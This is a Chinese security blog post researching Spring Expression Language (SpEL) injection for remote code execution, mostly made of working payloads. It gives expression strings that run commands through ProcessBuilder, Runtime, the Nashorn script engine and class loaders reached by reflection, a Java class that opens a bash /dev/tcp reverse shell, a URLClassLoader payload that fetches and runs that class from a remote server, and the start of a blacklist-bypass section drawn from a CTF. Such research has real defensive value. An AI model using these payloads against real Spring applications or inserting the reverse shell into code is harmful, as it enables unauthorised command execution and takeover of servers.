

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/bg/favicon.png">
  <link rel="icon" type="image/png" href="/img/bg/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="h3zh1">
  <meta name="keywords" content="">
  <title>SpEL注入研究 - h3zh1&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":110,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Blog of h3zh1</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/bg/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="SpEL注入研究">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-03-07 00:00" pubdate>
        2021年3月7日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      39
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SpEL注入研究</h1>
            
            <div class="markdown-body">
              <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>和伙计一起研究了一下SpEL注入RCE分析以及技巧，抛砖引玉，拿来分享一下。</p>
<h2 id="SpEL注入基础"><a href="#SpEL注入基础" class="headerlink" title="SpEL注入基础"></a>SpEL注入基础</h2><h3 id="SpEL简介"><a href="#SpEL简介" class="headerlink" title="SpEL简介"></a>SpEL简介</h3><p>Spring表达式语言（简称 <strong>SpEL</strong>，全称<strong>Spring Expression Language</strong>）是一种功能强大的表达式语言，支持在运行时查询和操作对象图。它语法类似于OGNL，MVEL和JBoss EL，在方法调用和基本的字符串模板提供了极大地便利，也开发减轻了Java代码量。另外 , SpEL是Spring产品组合中表达评估的基础，但它并不直接与Spring绑定,可以独立使用。</p>
<h3 id="基本用法"><a href="#基本用法" class="headerlink" title="基本用法:"></a>基本用法:</h3><p> SpEL调用流程 : 1.新建解析器 2.解析表达式 3.注册变量(可省,在取值之前注册) 4.取值</p>
<p>示例1:不注册新变量的用法</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">ExpressionParser parser = <span class="hljs-keyword">new</span> SpelExpressionParser();<span class="hljs-comment">//创建解析器</span><br>Expression exp = parser.parseExpression(<span class="hljs-string">&quot;&#x27;Hello World&#x27;.concat(&#x27;!&#x27;)&quot;</span>);<span class="hljs-comment">//解析表达式</span><br>System.out.println( exp.getValue() );<span class="hljs-comment">//取值，Hello World！</span><br></code></pre></div></td></tr></table></figure>

<p>示例2:自定义注册加载变量的用法</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Spel</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> String name = <span class="hljs-string">&quot;何止&quot;</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> </span>&#123;<br>        Spel user = <span class="hljs-keyword">new</span> Spel();<br>        StandardEvaluationContext context=<span class="hljs-keyword">new</span> StandardEvaluationContext();<br>        context.setVariable(<span class="hljs-string">&quot;user&quot;</span>,user);<span class="hljs-comment">//通过StandardEvaluationContext注册自定义变量</span><br>      <br>        SpelExpressionParser parser = <span class="hljs-keyword">new</span> SpelExpressionParser();<span class="hljs-comment">//创建解析器</span><br>        Expression expression = parser.parseExpression(<span class="hljs-string">&quot;#user.name&quot;</span>);<span class="hljs-comment">//解析表达式</span><br>        System.out.println( expression.getValue(context).toString() );<span class="hljs-comment">//取值,输出何止</span><br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>了解了基本用法之后，我们可以通过创建实例，调用方法先构造几个rce的payload</p>
<p><strong>会用到的语法</strong></p>
<p>spel语法中的<code>T()</code>操作符 , <code>T()</code>操作符会返回一个object , 它可以帮助我们获取某个类的静态方法 , 用法<code>T(全限定类名).方法名()</code>，后面会用得到</p>
<p>#操作符可以用于标记对象</p>
<h2 id="RCE第一部分"><a href="#RCE第一部分" class="headerlink" title="RCE第一部分"></a>RCE第一部分</h2><p>第一部分就是最基础的思路 : 新建实例 , 调用命令执行方法</p>
<h3 id="01-调用ProcessBuilder"><a href="#01-调用ProcessBuilder" class="headerlink" title="01 : 调用ProcessBuilder"></a>01 : 调用ProcessBuilder</h3><p>java代码</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">String[] str = <span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;;<br>ProcessBuilder p = <span class="hljs-keyword">new</span> ProcessBuilder( str );<br>p.start();<span class="hljs-comment">//打开计算器</span><br></code></pre></div></td></tr></table></figure>

<p>spel中也可以使用new来构造，写法几乎一样，我们可以把表达式简化为一行</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">new</span> java.lang.ProcessBuilder(<span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;).start()<br></code></pre></div></td></tr></table></figure>

<p>完整的执行代码</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"> String cmdStr = <span class="hljs-string">&quot;new java.lang.ProcessBuilder(new String[]&#123;\&quot;open\&quot;,\&quot;/System/Applications/Calculator.app\&quot;&#125;).start()&quot;</span>;<br><br>ExpressionParser parser = <span class="hljs-keyword">new</span> SpelExpressionParser();<span class="hljs-comment">//创建解析器</span><br>Expression exp = parser.parseExpression(cmdStr);<span class="hljs-comment">//解析表达式</span><br>System.out.println( exp.getValue() );<span class="hljs-comment">//弹出计算器</span><br></code></pre></div></td></tr></table></figure>

<p>当然java.lang包下的类无需使用全限定类名,故表达式可简化来bypass</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">new</span> ProcessBuilder(<span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;).start()<br></code></pre></div></td></tr></table></figure>



<h3 id="02-调用RunTime"><a href="#02-调用RunTime" class="headerlink" title="02 : 调用RunTime"></a>02 : 调用RunTime</h3><p>java调用，由于Runtime类使用了单例模式-饿汉式，需要调用Runtime的静态方法得到Runtime实例</p>
<p>正常的java调用</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">Runtime rt = Runtime.getRuntime();<span class="hljs-comment">//</span><br>rt.exec(<span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;);<br></code></pre></div></td></tr></table></figure>

<p>根据调用顺序给出两种payload , 和上个用法略有不同,解释在payload后给出</p>
<p>使用string参数形式 (java.lang包下的类不需要加全限定类名)</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">T(java.lang.Runtime).getRuntime().exec(<span class="hljs-string">&quot;open /System/Applications/Calculator.app&quot;</span>)<br></code></pre></div></td></tr></table></figure>

<p>使用字符串数组方法调用</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">T(Runtime).getRuntime().exec(<span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;)<br></code></pre></div></td></tr></table></figure>

<p>解释: 由于<code>RunTime类</code>使用了单例模式 ,获取对象的话不能直接通过构造方法获得,必须通过静态方法<code>getRuntime</code>来获得 , 其源码可参考下图 , 调用静态方法的话需要使用SpEL的<code>T()</code>操作符,<code>T()</code>操作符会返回一个object.</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gnxyqx742gj30ja07iwi6.jpg" srcset="/img/loading.gif" alt="image-20210224010602445"></p>
<h3 id="03-调用ScriptEngine"><a href="#03-调用ScriptEngine" class="headerlink" title="03 : 调用ScriptEngine"></a>03 : 调用ScriptEngine</h3><p>从<strong>ruilin</strong>师傅的文章学到还可以用js引擎(不知道能不能用颜文字或者其他js绕过的方法到这里，暂时没实验成功，测试成的师傅可以分享下).</p>
<p>获取所有js引擎信息的代码</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> </span>&#123;<br>    ScriptEngineManager manager = <span class="hljs-keyword">new</span> ScriptEngineManager();<br>    List&lt;ScriptEngineFactory&gt; factories = manager.getEngineFactories();<br>    <span class="hljs-keyword">for</span> (ScriptEngineFactory factory: factories)&#123;<br>        System.out.printf(<br>          <span class="hljs-string">&quot;Name: %s%n&quot;</span> + <span class="hljs-string">&quot;Version: %s%n&quot;</span> + <span class="hljs-string">&quot;Language name: %s%n&quot;</span> +<br>          <span class="hljs-string">&quot;Language version: %s%n&quot;</span> +<br>          <span class="hljs-string">&quot;Extensions: %s%n&quot;</span> +<br>          <span class="hljs-string">&quot;Mime types: %s%n&quot;</span> +<br>          <span class="hljs-string">&quot;Names: %s%n&quot;</span>,<br>          factory.getEngineName(),<br>          factory.getEngineVersion(),<br>          factory.getLanguageName(),<br>          factory.getLanguageVersion(),<br>          factory.getExtensions(),<br>          factory.getMimeTypes(),<br>          factory.getNames()<br>        );<br>    &#125;<br> &#125;<br></code></pre></div></td></tr></table></figure>

<blockquote>
<p>  Name: Oracle Nashorn<br>  Version: 1.8.0_261<br>  Language name: ECMAScript<br>  Language version: ECMA - 262 Edition 5.1<br>  Extensions: [js]<br>  Mime types: [application/javascript, application/ecmascript, text/javascript, text/ecmascript]<br>  <strong>Names: [nashorn, Nashorn, js, JS, JavaScript, javascript, ECMAScript, ecmascript]</strong></p>
</blockquote>
<p>通过结果中的Names，我们知道了所有的js引擎名称，故getEngineByName的参数可以填<code>[nashorn, Nashorn, js, JS, JavaScript, javascript, ECMAScript, ecmascript]</code>,</p>
<p>举java正常调用的个例子:</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">ScriptEngineManager sem = <span class="hljs-keyword">new</span> ScriptEngineManager();<br>ScriptEngine engine = sem.getEngineByName(<span class="hljs-string">&quot;nashorn&quot;</span>);<br>System.out.println(engine.eval(<span class="hljs-string">&quot;2+1&quot;</span>));<br></code></pre></div></td></tr></table></figure>

<p>那么payload也就显而易见:</p>
<p>比如调用<code>nashorn</code>引擎</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">new</span> javax.script.ScriptEngineManager().getEngineByName(<span class="hljs-string">&quot;nashorn&quot;</span>).eval(<span class="hljs-string">&quot;s=[2];s[0]=&#x27;open&#x27;;s[1]=&#x27;/System/Applications/Calculator.app&#x27;;java.lang.Runtime.getRuntime().exec(s);&quot;</span>)<br></code></pre></div></td></tr></table></figure>

<p>调用<code>javascript</code>引擎</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">[[$&#123;<span class="hljs-keyword">new</span> javax.script.ScriptEngineManager().getEngineByName(<span class="hljs-string">&quot;javascript&quot;</span>).eval(<span class="hljs-string">&quot;s=[2];s[0]=&#x27;open&#x27;;s[1]=&#x27;/System/Applications/Calculator.app&#x27;;java.lang.Runtime.getRuntime().exec(s);&quot;</span>)&#125;]]<br></code></pre></div></td></tr></table></figure>

<p>回显截图</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gny70wji40j30r909v40b.jpg" srcset="/img/loading.gif" alt="image-20210224055228307"></p>
<p>OK基础的第一部分到此结束</p>
<h2 id="RCE第二部分"><a href="#RCE第二部分" class="headerlink" title="RCE第二部分"></a>RCE第二部分</h2><p>下面开始第二部分 , 思路 : 反射构造RCE ，下面反射中用到的类包括但不限于上述部分</p>
<p>首先简单介绍反射 :</p>
<p>JAVA反射机制是在运行状态中，对于任意一个类，都能够知道这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意方法和属性；这种动态获取信息以及动态调用对象方法的功能称为java语言的反射机制</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0iqexgm2j30fs04pt8p.jpg" srcset="/img/loading.gif" alt="image-20210224040143681"></p>
<p>然后简单介绍ClassLoader :</p>
<p> JVM(java虚拟机) 拥有多种ClassLoader, 不同的 ClassLoader 会从不同的地方加载字节码文件, 加载方式可以通过不同的文件目录加载, 也可以从不同的 jar 文件加载，还包括使用网络服务地址来加载。几个重要的 ClassLoader : <code>BootstrapClassLoader</code>、<code>ExtensionClassLoader</code> 和<code>AppClassLoader</code>、<code>UrlClassLoader</code></p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1go24rdsytgj30ap09b74h.jpg" srcset="/img/loading.gif" alt="image-20210226060838110"></p>
<p>下面构造会用到<code>AppClassLoader</code>和<code>UrlClassLoader</code></p>
<h3 id="04-UrlClassLoader"><a href="#04-UrlClassLoader" class="headerlink" title="04 : UrlClassLoader"></a>04 : UrlClassLoader</h3><blockquote>
<p>  URLClassLoader 可以加载远程类库和本地路径的类库</p>
</blockquote>
<p>调用思路 : 远程加载class文件，通过函数调用或者静态代码块来调用</p>
<p>先构造一份Exp.jar , 放到远程vps即可</p>
<p>一份通过构造方法反弹shell的Exp.java实例</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Exp</span></span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">Exp</span><span class="hljs-params">(String address)</span></span>&#123;<br>        address = address.replace(<span class="hljs-string">&quot;:&quot;</span>,<span class="hljs-string">&quot;/&quot;</span>);<br>        ProcessBuilder p = <span class="hljs-keyword">new</span> ProcessBuilder(<span class="hljs-string">&quot;/bin/bash&quot;</span>,<span class="hljs-string">&quot;-c&quot;</span>,<span class="hljs-string">&quot;exec 5&lt;&gt;/dev/tcp/&quot;</span>+address+<span class="hljs-string">&quot;;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done&quot;</span>);<br>        <span class="hljs-keyword">try</span> &#123;<br>            p.start();<br>        &#125; <span class="hljs-keyword">catch</span> (IOException e) &#123;<br>            e.printStackTrace();<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>起一个http服务示例</p>
<figure class="highlight sh"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs sh">http python -m SimpleHTTPServer 8990<br></code></pre></div></td></tr></table></figure>

<p>Payload</p>
<p>注意必须使用全限定类名 , 或许这个可以过一些bypass</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">new</span> java.net.URLClassLoader(<span class="hljs-keyword">new</span> java.net.URL[]&#123;<span class="hljs-keyword">new</span> java.net.URL(<span class="hljs-string">&quot;http://127.0.0.1:8999/Exp.jar&quot;</span>)&#125;).loadClass(<span class="hljs-string">&quot;Exp&quot;</span>).getConstructors()[<span class="hljs-number">0</span>].newInstance(<span class="hljs-string">&quot;127.0.0.1:2333&quot;</span>)<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gny34cdvpij30no08q3ze.jpg" srcset="/img/loading.gif" alt="image-20210224033722685"></p>
<h3 id="05-AppClassLoader"><a href="#05-AppClassLoader" class="headerlink" title="05 : AppClassLoader"></a>05 : AppClassLoader</h3><blockquote>
<p>  AppClassLoader 直接面向用户,它会加载 Classpath 环境变量里定义的路径中的 jar 包和目录</p>
<p>  由于双亲委派的存在,它可以加载到我们想要的类</p>
</blockquote>
<p>使用的前提是获取 , 获取AppClassLoader可以通过ClassLoader类的静态方法<strong>getSystemClassLoader</strong></p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">System.out.println(ClassLoader.getSystemClassLoader());<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0hsnjmwtj30b400vglg.jpg" srcset="/img/loading.gif" alt="image-20210226053613761"></p>
<ul>
<li><p>加载Runtime执行</p>
<p>  由于需要调用到静态方法所以还是要用到<code>T()</code>操作</p>
  <figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">T(ClassLoader).getSystemClassLoader().loadClass(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>).getRuntime().exec(<span class="hljs-string">&quot;open /System/Applications/Calculator.app&quot;</span>)<br></code></pre></div></td></tr></table></figure>
</li>
<li><p>加载ProcessBuilder执行</p>
  <figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">[[$&#123;T(ClassLoader).getSystemClassLoader().loadClass(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>).getConstructors()[<span class="hljs-number">1</span>].newInstance(<span class="hljs-keyword">new</span> String[]&#123;<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;).start()&#125;]]<br></code></pre></div></td></tr></table></figure>



</li>
</ul>
<h3 id="06-通过其他类获取AppClassLoader"><a href="#06-通过其他类获取AppClassLoader" class="headerlink" title="06: 通过其他类获取AppClassLoader"></a>06: 通过其他类获取AppClassLoader</h3><p>这里我新开一个标题原因是在实际的web项目开发者的项目会导入很多依赖的jar，或编写自定义类</p>
<p><strong>实例1:</strong></p>
<p>使用spel的话一定存在名为org.springframework的包，这个包下有许许多多的类，而这些类的classloader就是app</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0i2bbduej30ly07n768.jpg" srcset="/img/loading.gif" alt="image-20210226054533360"></p>
<p>下面给出一些java测试代码和payload</p>
<p>比如: org.springframework.expression.Expression类</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">System.out.println( org.springframework.expression.Expression.class.getClassLoader() );<span class="hljs-comment">//这会输出AppClassLoader</span><br></code></pre></div></td></tr></table></figure>

<p>那么很容易就可以得到一个获取AppClassLoader的方法 ,  </p>
<figure class="highlight reasonml"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs reasonml"><span class="hljs-constructor">T(<span class="hljs-params">org</span>.<span class="hljs-params">springframework</span>.<span class="hljs-params">expression</span>.Expression)</span>.get<span class="hljs-constructor">Class()</span>.get<span class="hljs-constructor">ClassLoader()</span><br></code></pre></div></td></tr></table></figure>

<p>假设使用thyemleaf的话会有org.thymeleaf.context.AbstractEngineContext:</p>
<figure class="highlight reasonml"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs reasonml"><span class="hljs-constructor">T(<span class="hljs-params">org</span>.<span class="hljs-params">thymeleaf</span>.<span class="hljs-params">context</span>.AbstractEngineContext)</span>.get<span class="hljs-constructor">Class()</span>.get<span class="hljs-constructor">ClassLoader()</span><span class="hljs-comment">//同样的结果</span><br></code></pre></div></td></tr></table></figure>

<p>假设有一个自定义的类那么可以:</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">T(com.ctf.controller.Demo).getClass().getClassLoader()<br></code></pre></div></td></tr></table></figure>

<p>新的类扩展比较多，上升到实际的话，如果是黑盒可以猜一些常用的依赖，然后测试一些类名；如果是代码审计那就直接看pom.xml或者lib里的包就好了</p>
<h3 id="07-通过内置对象加载UrlClassLoader"><a href="#07-通过内置对象加载UrlClassLoader" class="headerlink" title="07: 通过内置对象加载UrlClassLoader"></a>07: 通过内置对象加载UrlClassLoader</h3><p>request、response对象是web开发的常客 ,根据一些源码以及测试我发现他在项目启动后中会自动注册到spel中</p>
<p>我们可以通过HttpServletRequest或者HttpServletResponse获得URLClassLoader</p>
<p><code>#response.getClass().getClassLoader()</code></p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0iv2laz6j30eg0cqwfa.jpg" srcset="/img/loading.gif" alt="image-20210226061311374"></p>
<p>根据理论我们试着加载想要的类</p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">#response.getClass().getClassLoader().loadClass(&quot;java.lang.Runtime&quot;)<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0iw4hw3jj30kc0cst9o.jpg" srcset="/img/loading.gif" alt="image-20210226061411962"></p>
<p>或许我们可以尝试着绕过字符串比如:</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">#response.getClass().getClassLoader().loadClass(#request.getRequestedSessionId())<br>Cookie:JSESSIONID=java.lang.String;<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1go0zm8v74mj323c0si78y.jpg" srcset="/img/loading.gif" alt="image-20210226155213567"></p>
<p>ok……第二部分完结，最后来整点bypass</p>
<h3 id="Interesting-bypass"><a href="#Interesting-bypass" class="headerlink" title="Interesting bypass"></a>Interesting bypass</h3><p>看到这里会有些累了，这里需要有一些java基础来有选择性的bypass </p>
<p>假设黑名单有如下情况，来源于ddctf :</p>
